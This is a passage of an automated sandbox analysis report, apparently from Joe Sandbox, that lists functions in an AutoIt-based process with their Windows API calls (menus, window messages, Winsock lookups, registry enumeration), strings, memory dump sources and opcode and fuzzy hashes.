                                                                                                                                                                            • Opcode Fuzzy Hash: 71b85aafb140f5fee562f27483bf2f1379a565380f592f24880223a5dc6391d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 2141D031A00358ABDB219FA5CC49FEA7BA9FF49350F10112AF958EB291D7709D84CB90
                                                                                                                                                                            Function 008BC53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008BC5D9
                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 008BC5F9
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 008BC62F
                                                                                                                                                                            • GetMenuItemCount.USER32(00FF57C0), ref: 008BC680
                                                                                                                                                                            • InsertMenuItemW.USER32(00FF57C0,?,00000001,00000030), ref: 008BC6A8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                            • Opcode ID: a2b62c999511a44f3e6f2d7f2cf27d48b53f15a51bde7bde572ba8697c59ea35
                                                                                                                                                                            • Instruction ID: a80bd4a957735ff6aeb18f08b226347abc6cfed30383ced35fdaebaa4e88cbf2
                                                                                                                                                                            • Opcode Fuzzy Hash: a2b62c999511a44f3e6f2d7f2cf27d48b53f15a51bde7bde572ba8697c59ea35
                                                                                                                                                                            • Instruction Fuzzy Hash: F6517E70A00249ABDB20CF68C984EEEBBF5FF6A314F14512DE411DB391E7709944CB62
                                                                                                                                                                            Function 008BE653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                                                            • Opcode ID: 7034032ceb4bb0b5e4d69cec17925c823f4f0202a966942a2036323e2741ae00
                                                                                                                                                                            • Instruction ID: 0f2787969f11be65377153fa45c44ead96a8001cf30bc2831fffd9f495353788
                                                                                                                                                                            • Opcode Fuzzy Hash: 7034032ceb4bb0b5e4d69cec17925c823f4f0202a966942a2036323e2741ae00
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B112131904219AFDB306B249C8AEDA37BCFF41310F1000A5F549DA192EFB0CA849A62
                                                                                                                                                                            Function 008D42A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 008D42C8
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008D43D7
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008D43E7
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008D457C
                                                                                                                                                                              • Part of subcall function 008C15B3: VariantInit.OLEAUT32(00000000), ref: 008C15F3
                                                                                                                                                                              • Part of subcall function 008C15B3: VariantCopy.OLEAUT32(?,?), ref: 008C15FC
                                                                                                                                                                              • Part of subcall function 008C15B3: VariantClear.OLEAUT32(?), ref: 008C1608
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                            • Opcode ID: 1c092988726af321c9e8aec2d0fb776d9871bb69ccc9d3037bec63476c8f7978
                                                                                                                                                                            • Instruction ID: 298ff4f4b5b5b57c7fb43a9dd3a5731864e8f1ae01830a63288dccd537de96d8
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c092988726af321c9e8aec2d0fb776d9871bb69ccc9d3037bec63476c8f7978
                                                                                                                                                                            • Instruction Fuzzy Hash: 459124756083459FCB04DF68C48196AB7E5FB88314F14892EF88ADB351DB30ED49CB92
                                                                                                                                                                            Function 008E2A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenu.USER32(?), ref: 008E2AE2
                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 008E2B14
                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008E2B3C
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E2B72
                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 008E2BAC
                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 008E2BBA
                                                                                                                                                                              • Part of subcall function 008B42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B42E6
                                                                                                                                                                              • Part of subcall function 008B42CC: GetCurrentThreadId.KERNEL32 ref: 008B42ED
                                                                                                                                                                              • Part of subcall function 008B42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2E43), ref: 008B42F4
                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008E2C42
                                                                                                                                                                              • Part of subcall function 008BF1A7: Sleep.KERNEL32 ref: 008BF21F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                            • Opcode ID: 950423901810b07f98f019eb7bbc1cfb7dba2afbcb9a974c4a6fd8d54d19f79b
                                                                                                                                                                            • Instruction ID: 94a71a9851061eee4038d6e6e8dfa6861c4642d9645572d8cc7fa46befd35b1f
                                                                                                                                                                            • Opcode Fuzzy Hash: 950423901810b07f98f019eb7bbc1cfb7dba2afbcb9a974c4a6fd8d54d19f79b
                                                                                                                                                                            • Instruction Fuzzy Hash: FE71AE35A00259EFCB10EF69C881AAEB7F5FF49324F148459E816EB351DB34EE418B91
                                                                                                                                                                            Function 008E87FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 008E8896
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 008E88A2
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 008E897D
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 008E89B0
                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 008E89E8
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 008E8A0A
                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008E8A22
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                            • Opcode ID: a60dc82c433d8fe37dee268a141da57a7090d598793c1d005f241a94a96b74ad
                                                                                                                                                                            • Instruction ID: 1b986c98173b1b0062620c01597d99e1a7b976392b76527b4a9b09fa42add168
                                                                                                                                                                            • Opcode Fuzzy Hash: a60dc82c433d8fe37dee268a141da57a7090d598793c1d005f241a94a96b74ad
                                                                                                                                                                            • Instruction Fuzzy Hash: 98719B34A04298EFEB259F56C894FBE7BB9FF0A300F140469E859D7262CB31AD41DB11
                                                                                                                                                                            Function 008B808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008B80D1
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008B80F7
                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 008B80FA
                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 008B811B
                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 008B8124
                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 008B813E
                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 008B814C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                            • Opcode ID: 18c2ed42f08181e55f729c78dd770cc84611284df4721c97d17246124bd18a54
                                                                                                                                                                            • Instruction ID: 944b66872c7103afe2cfe5956fc6a2a3e7b710042493087c64ea1973d7a5febf
                                                                                                                                                                            • Opcode Fuzzy Hash: 18c2ed42f08181e55f729c78dd770cc84611284df4721c97d17246124bd18a54
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D217F75205208EF9B10AFACDC89CEA77ECFB493647008125F915DB3A0DA70EC4ACB64
                                                                                                                                                                            Function 008E4A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00857759
                                                                                                                                                                              • Part of subcall function 0085771B: GetStockObject.GDI32(00000011), ref: 0085776D
                                                                                                                                                                              • Part of subcall function 0085771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00857777
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008E4A71
                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008E4A7E
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008E4A89
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008E4A98
                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008E4AA4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                            • Opcode ID: 524981de6fb44a0ed7fdb09d7709b75e5576e39f750f86097ac85e9a8245c9be
                                                                                                                                                                            • Instruction ID: 834a01ccf106541a915c657fd8445d7b85790e0e6861deb1db6e2e5ebeb57752
                                                                                                                                                                            • Opcode Fuzzy Hash: 524981de6fb44a0ed7fdb09d7709b75e5576e39f750f86097ac85e9a8245c9be
                                                                                                                                                                            • Instruction Fuzzy Hash: 961193B115021DBEEF119F65CC85EE77F9DFF09758F004111FA18E6050C6719C219BA4
                                                                                                                                                                            Function 008BE223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008BE23D
                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 008BE244
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008BE25A
                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 008BE261
                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008BE2A5
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 008BE282
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                            • Opcode ID: 229e06e9f1b24503db932fee1d691f3edf06044c16c5de995f72957ac0c77555
                                                                                                                                                                            • Instruction ID: fd6492547474fd31205acaf0c6090d0a97df1311643ca988b264cf9e8833bf24
                                                                                                                                                                            • Opcode Fuzzy Hash: 229e06e9f1b24503db932fee1d691f3edf06044c16c5de995f72957ac0c77555
                                                                                                                                                                            • Instruction Fuzzy Hash: D50112F6900348BFE71197D4DDC9EE6776CFB08304F004591B745E6151E6749E888B75
                                                                                                                                                                            Function 008D25BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 008D271D
                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008D273E
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 008D274F
                                                                                                                                                                            • htons.WSOCK32(?), ref: 008D2838
                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 008D27E9
                                                                                                                                                                              • Part of subcall function 008B4277: _strlen.LIBCMT ref: 008B4281
                                                                                                                                                                              • Part of subcall function 008D3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,008CF569), ref: 008D3B9D
                                                                                                                                                                            • _strlen.LIBCMT ref: 008D2892
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                            • Opcode ID: bf41a9209612583b3f74f12c66589aa9a49e3cb9a621616b7ab967e1b4675b30
                                                                                                                                                                            • Instruction ID: 6a687a460e4dfde217fa4a72b09a0ff1d9b8271e5965411b90e5af7cae11f843
                                                                                                                                                                            • Opcode Fuzzy Hash: bf41a9209612583b3f74f12c66589aa9a49e3cb9a621616b7ab967e1b4675b30
                                                                                                                                                                            • Instruction Fuzzy Hash: FDB1B031204340AFD714DF28C895E2ABBA5FFA4318F54865DF4968B3A2DB31ED45CB92
                                                                                                                                                                            Function 00880547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __allrem.LIBCMT ref: 0088044A
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00880466
                                                                                                                                                                            • __allrem.LIBCMT ref: 0088047D
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0088049B
                                                                                                                                                                            • __allrem.LIBCMT ref: 008804B2
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008804D0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                            • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                                                                                            • Instruction ID: e33b1b1fd12707957a154af1a4707c862d39bdc64bc78337b86a2278606ed96d
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                                                                                            • Instruction Fuzzy Hash: C381D572A40706ABE764BE6DDC81B6A73A8FF44328F24412EF611D6391E770D9088F95
                                                                                                                                                                            Function 0088658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00878669,00878669,?,?,?,008867DF,00000001,00000001,8BE85006), ref: 008865E8
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008867DF,00000001,00000001,8BE85006,?,?,?), ref: 0088666E
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00886768
                                                                                                                                                                            • __freea.LIBCMT ref: 00886775
                                                                                                                                                                              • Part of subcall function 00883BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A99,?,0000015D,?,?,?,?,008785D0,000000FF,00000000,?,?), ref: 00883BE2
                                                                                                                                                                            • __freea.LIBCMT ref: 0088677E
                                                                                                                                                                            • __freea.LIBCMT ref: 008867A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                            • Opcode ID: 8fd405ad54bf1fadc0b5756a1d3d36412ba2e3352a3568c052f20c6cc1871ddd
                                                                                                                                                                            • Instruction ID: a064ae009d39cc017f8c862b0d0250be5d0375902e14a46d86d370c4c036499b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8fd405ad54bf1fadc0b5756a1d3d36412ba2e3352a3568c052f20c6cc1871ddd
                                                                                                                                                                            • Instruction Fuzzy Hash: 3451BF72601216ABEB25BF64CC82EBA77AAFB44B68B154728F904D6150FB34DC64C790
                                                                                                                                                                            Function 008DC53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008DD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DC00D,?,?), ref: 008DD314
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD350
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3C7
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3FD
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC629
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC684
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DC6C9
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008DC6F8
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DC752
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008DC75E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
